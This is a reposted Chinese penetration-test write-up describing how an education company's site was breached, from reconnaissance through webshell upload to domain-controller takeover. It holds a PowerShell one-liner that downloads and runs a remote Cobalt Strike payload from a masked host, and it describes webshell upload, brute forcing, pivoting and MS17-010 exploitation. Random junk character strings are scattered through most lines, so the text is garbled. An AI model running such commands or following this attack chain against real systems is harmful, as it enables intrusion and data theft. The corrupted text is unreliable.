9 U% A* d: L/ }7 b0 E3 j
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路% w7 T/ V/ A& q0 \8 A
' ]2 t) x! D# s) d# R7 }5 B5 H3 H3 }! G; ^/ s, S
" ~ z/ E/ O: ~' h
" U( i, B+ p2 l' T* Z1 S9 N- F; R+ {7 R' A3 |! K, @6 O; }7 v
正文
* x/ h h3 H/ Q }
9 ]' M1 W/ X6 X z3 c! ~9 g% P/ |6 M6 Y+ Q: g
$ L. V$ a3 {( @+ c, g' Q& Y( @
/ H4 h" b% ~% w1 j" ~9 n8 J, ~6 u0 R" U/ Y/ @6 u1 l, n
目标:www.xxxx.com(一家教育机构) 8 ^8 c) u# P( m0 ]
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
- X( i+ q$ @% a, ?) ~: R6 U0 b3 q
' t' ~: f0 Z- _* W
6 \6 D; }% K" e) h( @ ; C) k: Y# E) Z0 y
5 g* Q7 ]$ a5 c! k0 h, F+ w1 O
# \; h; S) t, A) _( {- l$ \; v* q 进行了简单的信息搜集 ' |/ j, j0 l$ t( J; r
3 a% @; `6 Y6 e: i9 x4 v3 j$ M) \
, e7 {7 f* D% X j# u) D" o& o + n3 a0 v# M0 H7 X+ r+ n1 r
: x- J7 P, W+ K% c4 \4 y% @2 H
子域名搜集/ U. g/ T7 w8 G2 R; y, r9 [+ C9 U
, |: Y) d! `" K: Z
# `5 I: Y0 G2 r+ v
: G# f3 K+ F& M9 M6 _ ' f/ h0 q. m( L0 K J
. i/ d% t/ x2 l/ P3 b. K
fofa找资产 # L/ N, C$ l% `$ \9 G: }
% \, V( Y% `0 t1 ^( V
) i- C7 T' ?4 j
2 @0 }8 y9 n1 M( c+ t
9 l" D* m0 ? r/ e+ y' U
' n" s- @; x, m# K
5 y6 `! O' j/ H6 _* }) Y* X* y7 d4 E w( I. z
一共七个资产。去重之后只有两个。
: I; D2 Q4 X: _
; q2 M" P4 P" Q* R" K* l. \' q( U/ K9 n8 j4 Q0 O
- l) z1 A v: F0 D5 B& v
]0 l3 {2 b0 X$ s2 E# e
目录探测7 ^" A( F4 n5 K6 F+ `8 e
8 m8 _/ ~9 n, R8 V* A5 |
6 m8 G( |. |6 `- N% k 7 p) H% F' v9 P! O
6 U3 p( {( I; @4 j+ L
% ^& D2 ?: |& @; D% e( ^/ X 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 ) q8 O% d5 A5 _) |7 x
1 _1 b; ~. t- C# O. }
1 D ^: Z" Z S
, z2 `5 T* |( R' N' C
- K* Z% @$ H* q. i* C 我又尝试了通过修改返回包来绕过登录界面$ p0 Z' W1 h) w0 v k5 C2 }
- r( t$ x8 j- ~3 R% y8 X! e) m; ~
% G% V" P0 q1 z$ Q% l( s( w
$ M# F6 W) K" E/ W3 \ 4 R8 f' U& A9 O; I! G& R! e
# V; z! P2 z- q
还是不行,尝试注入无果0 b4 d: a( D A, t2 u( Q0 [8 I
v# P K. \$ w& s
9 \- ^2 q0 X, i. L6 R+ J
5 t. E; l0 r; y* j) h+ m* Y
5 t! y% Y$ \9 a# x$ R9 r% f( n3 U+ T' M' N y
不过我目录探测出了一处Spring信息泄露
% R* C# u6 J6 Q; a5 l) Y+ ~6 m6 D 4 U d: n" l! }& R
6 i) Z8 D2 q9 u; [% ]' U 9 r# ` d# I' h- H
6 b+ t+ O1 _: z
4 Y* F5 f6 c% E5 H2 r" L
$ E( G( K8 g: f7 |- Q; p0 O% ?9 `' [5 i3 I/ e6 l, W
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录) ]0 o1 ]2 P9 ]. Z! v
3 K# S+ d7 g, b
% b& p m0 f3 J4 x. W2 U
" [+ J, V) @1 a# Z {2 ^+ x : V$ I0 G3 j0 A* u0 k' v
. c* y/ `* I; o/ D
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。+ I% n0 Y" u6 I
5 g% {! ?9 D# T/ C9 F: N
3 ~% V+ ^5 H1 p& o( k / @; J9 i8 r6 R
# p7 k; Y+ F* }) y& }" |" P M0 Q
}* _$ x4 `& K" r# R9 H' w 获取有些师傅到这一步就手机抓包电脑测了。$ g$ v9 s) q' q! E1 v
, n) i5 W I% }% Z9 J
! ~% o7 {, w& A9 L Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。1 Q d# h4 H& [0 p
& I: ?; K% _& _4 A
4 D9 @$ ]5 g/ ^5 M9 d1 Z) R 其中在一个公众号发现了小程序,可以进行注册。' N+ Z8 j3 D6 } q
/ Y8 q' b V: a5 h M5 J5 L5 X& r" _( F3 L; Y. ?9 V9 }
看到了头像上传,尝试上传获取WebShell
0 l3 W( k+ g+ X5 m 3 Z, c/ b/ `: f* W) U/ o2 ^
$ e# [( q2 c, O/ w
, ^7 J- M9 B6 [7 E : X- L8 z F) P& ?4 r
5 a& h0 o; b( K4 \ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
. [1 w, R1 {) M. R; D
2 v$ i* X# I9 c- Z2 W7 I# _/ D1 g" o( J9 r. I' j, F' |0 C
5 g! {9 h9 _$ @, M
" O7 `2 @3 ~ K- t! l6 x6 x6 U9 R9 \; l& R- G# L
然后上了大马
) b; X7 Z# X% B a. R1 q, [
3 I' v" _3 H0 ~# P( L u3 y/ M/ f5 R9 o* I% y6 h% i
3 L: _4 Y( K2 d 0 ?! [7 i3 v1 u
, \- ^$ j4 [; B, [* k3 _
2 c+ Q3 C7 b B5 Z( ?- c: T2 W
* Y7 Y* U8 n1 O7 e: Q5 Q& A8 o) |
1 i9 k) G" e5 b4 W6 d- _ 通过翻找文件发现数据库账号密码& [9 Q, p! @, g" H k: ^ H
/ Z3 l& G, n6 {- @
$ d% n% D1 L4 S! g: L* m7 U
, ?, b; F# w/ A5 K, H1 S
, d8 g& }! `6 D: T- D7 j5 W, V
8 `, _# x' f+ \$ ]* l \1 }* _
--内网渗透
0 k$ z& M; D7 T 3 X1 O0 m8 _: u; S# j& I
' H: U+ I1 |+ z- a- b1 Z3 `" v
直接通过powershell执行 cs上线
5 i* X3 w& B. }' K k8 e/ w( e' Q5 N $ I0 h# R' t% Q6 q! _
: L/ g! q0 C; C powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
3 i% N$ ?& u" A0 R0 ^# g l9 p1 Q i1 z4 @. h
5 R+ S( |- V7 `, V; Z$ ]! z# T
) l- {8 L, s5 D' r. m& v
! k+ p {$ e# e4 G
" p6 F3 s: ~: n! K 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破' [& F+ ~- z6 T7 Z9 u9 ^6 g
2 s4 ^/ x2 Z, C: p+ J P3 A+ {
+ d+ u) V5 Y8 Z) z$ h% t ) {; _' r3 k4 m4 c/ ]6 O
3 o) P( ` x" i8 H
9 v1 i* U R: q9 u+ ?+ s5 z( G$ [ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
3 w# P% ^9 G' T& a9 W1 m
* N! w$ G& C7 B0 {. f6 ^1 {
# H& ?) ^' N3 \4 u3 x! L
+ @6 f, F# `/ q7 X7 F
2 F; g/ Q2 t: S# l) `$ v& {: {& t3 n2 n$ N% J
" I+ r- W# n% w$ V
- {+ A$ q4 o# w1 d5 J8 d9 E
1 [% G# Q% S% g+ y 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
1 C: C; h" q. J : ^, v7 y# g- K6 a* |+ A
3 ]' Z+ z6 l' u" B/ L: A 7 J3 m; q- P# N' W& t
- O# c: u' N5 W9 {
! [3 p4 ^" s! h1 d4 E9 w# S - q/ E! M. r, ?8 T1 r. a( j. v
4 }; i5 X1 r, Q3 m+ l! A! @
" R6 @( J# D/ L% \5 `1 u _
# E/ J X- q" Z! X. Q
, J3 e* c2 V- t# q7 `; `
# X4 I0 w2 _$ K5 J
) Q$ t/ }" B# q8 U' J * p9 e' v. f* `
+ ^$ g. j$ s+ w
2 h" J0 |- l. T1 \/ x 小结+ B6 O& B3 ^0 ]9 C
' a7 Y+ K/ L% }7 x6 F
7 m9 |5 ~3 s0 q/ r1 s. p% w" w
: l: s3 j: G0 Y; Q; P/ y1 C% Y
, B/ h# o* Q m& d% H& w" P0 r" m! b% h5 ?4 i1 v
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
5 m Z$ d- s; H. n2 h4 L) a; } 2 R0 V% u+ d' a: m8 i( v6 h. N
$ G4 u- \& j2 v9 T% ?6 H# D+ g
5 c9 m' ?' v8 ~7 `8 P& f' @) \8 x
" A8 b! Z$ t9 t8 ~9 \2 L
" l1 Z7 i- r4 `& c3 Z" m -
- j4 |9 u5 N7 ?4 I4 l
+ ^3 e% q! e' M6 R
: c/ \' @, k& j6 l -
! H7 {! K$ H" G; a & w, ~ G% V- J6 K( D1 n3 e$ p
* K; x8 Y/ E, R9 A) g
) b% |. a$ @$ y! ? B9 k5 a4 e B: Z
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html3 a. ?1 y+ K2 ^5 \3 f
: b! t5 E' v4 W$ ^# v
" V7 y" Q' Q# e7 u% X3 h + @# V/ }: A* {" c) P I
|